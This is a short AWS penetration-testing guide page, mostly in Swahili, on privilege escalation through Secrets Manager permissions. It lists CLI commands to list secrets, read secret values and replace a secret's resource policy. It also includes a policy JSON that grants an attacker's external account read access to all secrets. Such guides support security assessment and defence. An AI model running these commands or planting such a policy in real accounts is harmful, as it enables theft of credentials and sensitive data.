AWS - Secrets Manager Privesc

Meneja wa Siri

Kwa habari zaidi kuhusu meneja wa siri angalia:

secretsmanager:GetSecretValue

Mshambuliaji mwenye idhini hii anaweza kupata thamani iliyohifadhiwa ndani ya siri katika AWS Secretsmanager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Athari Inayowezekana: Kupata data nyeti sana ndani ya huduma ya AWS secrets manager.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Kwa ruhusa za awali, ni kupatikana kutoa upatikanaji kwa wakala/waakaunti wengine (hata nje) kufikia siri. Tafadhali kumbuka kwamba ili kusoma siri zilizoandikwa na ufunguo wa KMS, mtumiaji pia anahitaji kuwa na upatikanaji wa ufunguo wa KMS (maelezo zaidi katika Ukurasa wa Uchambuzi wa KMS).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version" : "2012-10-17",
"Statement" : [ {
"Effect" : "Allow",
"Principal" : {
"AWS" : "arn:aws:iam::<attackers_account>:root"
},
"Action" : "secretsmanager:GetSecretValue",
"Resource" : "*"
} ]
}